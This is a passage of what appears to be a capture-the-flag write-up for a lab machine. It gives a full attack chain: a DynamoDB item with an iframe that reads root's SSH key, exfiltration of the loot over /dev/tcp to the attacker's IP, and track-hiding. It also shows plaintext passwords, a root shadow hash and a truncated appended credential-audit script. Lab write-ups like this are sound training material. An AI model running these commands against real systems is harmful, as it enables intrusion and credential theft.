class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> documentation for DynamoDB, we can create the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> table with:</span></span><div id="https://www.notion.so/9f9467419b724425abdd1485e83061a1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb create-table \
--table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 \
--endpoint-url http://localhost:4566</code></span></span></p></div></li><li id="https://www.notion.so/32147f87e4344617a00a65663b83d89d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Ransomware</code></span><span class="SemanticString"> item that embeds root's SSH key in an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">iframe</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/5c9a878f9a9940ab9c3f8232473bc800" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb put-item \
--table-name alerts \
--item '{"title":{"S":"Ransomware"}, "data":{"S":"<html><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}}' \
--return-consumed-capacity TOTAL \
--endpoint-url http://localhost:4566</code></span></span></p></div></li><li id="https://www.notion.so/24dde59c810f4dcb8a8382cfbd659f22" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make a POST request to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">bucket-app</code></span><span class="SemanticString"> on port 8000 to execute the PHP code:</span></span><div id="https://www.notion.so/81ffe7626f184198bddfbcbed95741bd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl -XPOST --data "action=get_alerts" http://localhost:8000</code></span></span></p></div></li><li id="https://www.notion.so/4f81598e427742b5b04c170d4f3bfbbe" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Remember that the database resets roughly once a minute, so we have to be quick. Let's combine these steps into an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws_exploit.sh</code></span><span class="SemanticString"> script:</span></span><pre id="https://www.notion.so/0e836f0b36a649939f14062c2d4963a4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token comment"># Create alerts table</span>
aws dynamodb create-table <span class="token punctuation">\</span>
--table-name alerts <span class="token punctuation">\</span>
--attribute-definitions <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>title,AttributeType<span class="token operator">=</span>S <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>data,AttributeType<span class="token operator">=</span>S <span class="token punctuation">\</span>
--key-schema <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>title,KeyType<span class="token operator">=</span>HASH <span class="token assign-left variable">AttributeName</span><span class="token operator">=</span>data,KeyType<span class="token operator">=</span>RANGE <span class="token punctuation">\</span>
--provisioned-throughput <span class="token assign-left variable">ReadCapacityUnits</span><span class="token operator">=</span><span class="token number">10</span>,WriteCapacityUnits<span class="token operator">=</span><span class="token number">5</span> <span class="token punctuation">\</span>
--endpoint-url http://localhost:4566
<span class="token comment"># Create Ransomware item with payload</span>
aws dynamodb put-item <span class="token punctuation">\</span>
--table-name alerts <span class="token punctuation">\</span>
<span class="token parameter variable">--item</span> <span class="token string">'{
"title": {"S": "Ransomware"},
"data": {"S": "<html><body><iframe src='</span>/root/.ssh/id_rsa<span class="token string">'></iframe></body></html>"}
}'</span> <span class="token punctuation">\</span>
--return-consumed-capacity TOTAL <span class="token punctuation">\</span>
--endpoint-url http://localhost:4566
<span class="token comment"># Make curl request</span>
<span class="token function">curl</span> <span class="token parameter variable">-XPOST</span> <span class="token parameter variable">--data</span> <span class="token string">"action=get_alerts"</span> http://localhost:8000
<span class="token comment"># Deliver the loot and hide our tracks</span>
<span class="token function">tar</span> <span class="token parameter variable">-czvf</span> /tmp/.samiko/loot.tar.gz /var/www/bucket-app/files/
<span class="token function">cat</span> /tmp/.samiko/loot.tar.gz <span class="token operator">></span> /dev/tcp/10.10.14.103/6969
<span class="token function">rm</span> /tmp/.samiko/loot.tar.gz</span></span></span></code></pre></li><li id="https://www.notion.so/9e284641161a4c6c98a0b67d8bc5c268" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Start a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString"> listener on the target machine to receive the script:</span></span><div id="https://www.notion.so/1cd4a6afd24740eca7f8c8991ea3a9b8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4204 > aws_exploit.sh</code></span></span></p></div></li><li id="https://www.notion.so/c71ee1e8c4924d15808fd1937ed20d5c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Send the script from our local machine:</span></span><div id="https://www.notion.so/4d641d10eb134d8d893bd9782adf5e60" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat aws_exploit.sh > /dev/tcp/10.10.10.212/4204</code></span></span></p></div></li><li id="https://www.notion.so/9b7577cac138410db80392e25e1f6dc9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make the script executable:</span></span><div id="https://www.notion.so/81e3cc28d05d4eeb90509e0a9844bb0b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod +x ./aws_exploit.sh</code></span></span></p></div></li><li id="https://www.notion.so/f3056719ac094aabad3286c3ae494edd" class="BulletedList"><span class="SemanticStringArray"><span 
class="SemanticString">Start a listener on our local machine:</span></span><div id="https://www.notion.so/59664c587a1f4d05ac11827c4825367e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969</code></span></span></p></div></li><li id="https://www.notion.so/10473987b23a429c9821e2aa7d9d2228" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Run the script on the target:</span></span><div id="https://www.notion.so/d85726add4474f67834cfe2c8e322fcb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./aws_exploit.sh</code></span></span></p></div><pre id="https://www.notion.so/e6ce81b8628745c4a0dfbbbac5b76820" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>TABLEDESCRIPTION 1612282007.46 0 arn:aws:dynamodb:us-east-1:000000000000:table/alerts alerts 0 ACTIVE
ATTRIBUTEDEFINITIONS title S
ATTRIBUTEDEFINITIONS data S
KEYSCHEMA title HASH
KEYSCHEMA data RANGE
PROVISIONEDTHROUGHPUT 0.0 0.0 0 10 5
CONSUMEDCAPACITY 1.0 alerts
tar: Removing leading `/' from member names
/var/www/bucket-app/files/
/var/www/bucket-app/files/3693.html
/var/www/bucket-app/files/result.pdf</span></span></span></code></pre></li><li id="https://www.notion.so/9abc247486c3453098b91be1f5deca1f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After executing the script, we should receive the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.tar.gz</code></span><span class="SemanticString"> archive of the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/bucket-app/files/</code></span><span class="SemanticString"> directory, containing the root SSH key in a PDF file:</span></span><div id="https://www.notion.so/36599e09b93649cc84dcaa520f441b01" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir loot && tar -xzvf ./loot.tar.gz -C ./loot</code></span></span></p></div><div id="https://www.notion.so/2001eb1669904337935544441d851dbf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./loot/var/www/bucket-app/files/</code></span></span></p></div><pre id="https://www.notion.so/a0736d3702744a998755f90e08cf8e24" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 16
drwxr-x--- 2 samiko users 4096 Feb 3 02:37 .
drwxr-xr-x 3 samiko users 4096 Feb 3 02:40 ..
-rw-r--r-- 1 samiko users 65 Feb 3 02:37 7499.html
-rw-r--r-- 1 samiko users 3869 Feb 3 02:37 result.pdf</span></span></span></code></pre></li><li id="https://www.notion.so/2e1385d8f832437f9a3d8000385d839e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Copy the contents of the PDF to a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root_id_rsa</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/d7f4ef71865643489cb33cfc60c071a5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chromium ./var/www/bucket-app/files/result.pdf</code></span></span></p></div><div id="https://www.notion.so/24158dee437f42a69fe4e6cb9dd2e04b" class="Image Image--PageWidth"><figure><a href="https://i.imgur.com/K2LAPJP.png"><img src="https://i.imgur.com/K2LAPJP.png" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/3ac19510d6db45f98fa3839bc446a26f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After setting the appropriate permissions, use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root_id_rsa</code></span><span class="SemanticString"> to SSH in as root:</span></span><div id="https://www.notion.so/c8d99cd6dce24a4babf77021b563f9d3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod 700 root_id_rsa</code></span></span></p></div><div id="https://www.notion.so/6bc7e79e3fcd4eb7abed07193409beff" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh -i root_id_rsa root@10.10.10.212</code></span></span></p></div><div id="https://www.notion.so/7000305e5aeb4325946b2e7675ddea89" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/cf217ac848294fbba6d2cd5fa8b337e0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root
uid=0(root) gid=0(root) groups=0(root)</span></span></span></code></pre></li><li id="https://www.notion.so/2614a99376a34c28a77fe21a987dacaa" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/16c6a65c37ad41bd95abe1d54808b54d" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/16c6a65c37ad41bd95abe1d54808b54d"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/abd2f64197f64e8cbabccfc76286ff67" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">In the root home directory, we find the scripts used for the scheduled AWS resets:</span></span><div id="https://www.notion.so/e91afdbb38cf42eaa6306d2c136a862c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat start.sh</code></span></span></p></div><pre id="https://www.notion.so/6b3f483f706f413e8a33f9feee47dbf3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token builtin class-name">cd</span> /root <span class="token operator">&&</span> <span class="token function">docker-compose</span> up <span class="token parameter variable">-d</span>
<span class="token function">sleep</span> <span class="token number">20</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups s3://adserver
<span class="token function">sleep</span> <span class="token number">20</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups s3://adserver</span></span></span></code></pre><div id="https://www.notion.so/2f8ff46cdd944da38acf87a89f15f17b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat sync.sh</code></span></span></p></div><pre id="https://www.notion.so/004303da9a0945458caa6ff0fde3c963" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /root/files/*
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> s3://adserver/ /root/files/ <span class="token parameter variable">--exclude</span> <span class="token string">"*.png"</span> <span class="token parameter variable">--exclude</span> <span class="token string">"*.jpg"</span>
<span class="token function">cp</span> <span class="token parameter variable">-R</span> /root/files/* /var/www/html/</span></span></span></code></pre><div id="https://www.notion.so/1f41b255e7ee47beaa60cb7f42470576" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat restore.sh</code></span></span></p></div><pre id="https://www.notion.so/00cb88c332db4100a12b363a4e3d893a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token function">sleep</span> <span class="token number">60</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">rm</span> s3://adserver <span class="token parameter variable">--recursive</span>
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 rb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 mb s3://adserver
aws --endpoint-url<span class="token operator">=</span>http://localhost:4566 s3 <span class="token function">sync</span> /root/backups/ s3://adserver
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> /var/www/html/*
<span class="token function">cp</span> <span class="token parameter variable">-R</span> /root/backups/index.html /var/www/html/
/root/restore.php</span></span></span></code></pre><div id="https://www.notion.so/4fa9efa4034843379151601b81ab2811" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat restore.php</code></span></span></p></div><pre id="https://www.notion.so/1c0fb69d485f413185a39b4cfe8674fd" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>#!/usr/bin/php
<span class="token php language-php"><span class="token delimiter important"><?php</span>
<span class="token keyword">require</span> <span class="token string single-quoted-string">'/var/www/bucket-app/vendor/autoload.php'</span><span class="token punctuation">;</span>
<span class="token function">date_default_timezone_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'America/New_York'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>DynamoDbClient</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>Exception<span class="token punctuation">\</span>DynamoDbException</span><span class="token punctuation">;</span>
<span class="token variable">$client</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name class-name-fully-qualified">Aws<span class="token punctuation">\</span>Sdk</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'profile'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'default'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'region'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'us-east-1'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'version'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'latest'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'endpoint'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://localhost:4566'</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$dynamodb</span> <span class="token operator">=</span> <span class="token variable">$client</span><span class="token operator">-></span><span class="token function">createDynamoDb</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$params</span> <span class="token operator">=</span> <span class="token punctuation">[</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'alerts'</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$tableName</span><span class="token operator">=</span><span class="token string single-quoted-string">'users'</span><span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">createTable</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeDefinitions'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'username'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'S'</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'password'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'AttributeType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'S'</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeySchema'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'username'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeyType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'HASH'</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token punctuation">[</span>
<span class="token string single-quoted-string">'AttributeName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'password'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'KeyType'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'RANGE'</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'ProvisionedThroughput'</span> <span class="token operator">=></span> <span class="token punctuation">[</span>
<span class="token string single-quoted-string">'ReadCapacityUnits'</span> <span class="token operator">=></span> <span class="token number">5</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'WriteCapacityUnits'</span> <span class="token operator">=></span> <span class="token number">5</span>
<span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Cloudadm'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Welcome123!'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Mgmt'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Management@#1@#'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$response</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">putItem</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token variable">$tableName</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'Item'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'username'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'Sysadm'</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'password'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'S'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'n2vM-<_K_Q:.Aa2'</span><span class="token punctuation">)</span>
<span class="token punctuation">)</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span>
<span class="token keyword">catch</span><span class="token punctuation">(</span><span class="token class-name">Exception</span> <span class="token variable">$e</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">echo</span> <span class="token string single-quoted-string">'Message: '</span> <span class="token operator">.</span><span class="token variable">$e</span><span class="token operator">-></span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token variable">$dynamodb</span><span class="token operator">-></span><span class="token function">deleteTable</span><span class="token punctuation">(</span><span class="token variable">$params</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/a91688bb194d4adb9eeff945f5df02a7" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/a91688bb194d4adb9eeff945f5df02a7"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/a862c564962143b6918cdceb606a52aa" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root user's hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/a70321b0846046fda8a462e727eab78b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$rvx83lCm9lfbxx/M$x56XT96DB4RIHKtx8HhObNwNNe1TBEAUZlkhhgE2Goqg.ZnbIn/VOD.T2Q0XhcTxmLmAMrjk5ad6Gsd/jgjQn/:18528:0:99999:7:::</span></span></span></code></pre></li><li id="https://www.notion.so/b3a16e847bd8498593cd5d7bde9bc1a8" class="BulletedList"><span 
class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves and delete any residual files:</span></span><div id="https://www.notion.so/b343a6c87a4d416eaa4b95496809ae62" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm -r /tmp/.samiko/</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/c75de2b1d869487f8ea9e4b9da717898" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/c75de2b1d869487f8ea9e4b9da717898"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/3715ab55d37a428f8e65b191d7dc44f3" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html">https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html</a></span></span></li></ol></article>
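<p>The PHP snippet above stores usernames and passwords in a DynamoDB table as <code>{'S': ...}</code> typed attribute values through the low-level <code>putItem</code> API, with <code>password</code> even serving as the sort key. The Python block below is an added example, not part of the original writeup and not using the AWS SDK: it decodes that typed attribute-value format in general (S, N, BOOL, NULL, B, SS, NS, BS, L, M, going beyond the string-only items shown above) and then audits a table dump for credential-like attributes stored in the clear, which is the check a defender would run against a table like the one created here. The attribute-name list, the hash-prefix heuristic and the sample items are assumptions constructed for the example.</p>

```python
"""Decode DynamoDB low-level typed items and flag plaintext credentials.

Added example for this writeup; not part of the original page and not the AWS
SDK. The attribute-name list, hash-prefix heuristic and sample items below are
assumptions constructed for the example.
"""
from __future__ import annotations

import base64
import re
from decimal import Decimal
from typing import Any

# Attribute names that usually carry a secret (assumption: tune per application).
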